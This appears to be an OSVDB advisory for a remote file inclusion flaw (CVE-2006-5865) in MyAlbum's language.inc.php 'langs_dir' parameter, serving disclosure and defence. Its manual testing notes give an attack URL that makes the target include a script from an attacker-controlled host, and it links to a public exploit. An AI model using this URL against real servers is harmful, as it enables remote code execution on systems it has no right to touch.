MyAlbum language.inc.php langs_dir Variable Remote File Inclusion

2006-11-09T09:18:55
ID OSVDB:30280
Type osvdb
Reporter Silahsiz Kuvvetler(co-type@hotmail.com)
Modified 2006-11-09T09:18:55

Description

Vulnerability Description

MyAlbum contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to language.inc.php not properly sanitizing user input supplied to the 'langs_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

MyAlbum contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to language.inc.php not properly sanitizing user input supplied to the 'langs_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[MyAlbum_DIR]/language.inc.php?langs_dir=http://[attacker]/evilscript.txt?

References:

Vendor URL: http://www.comscripts.com/scripts/php.myalbum.1731.html Secunia Advisory ID:22619 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0396.html Generic Exploit URL: http://www.milw0rm.com/exploits/2747 CVE-2006-5865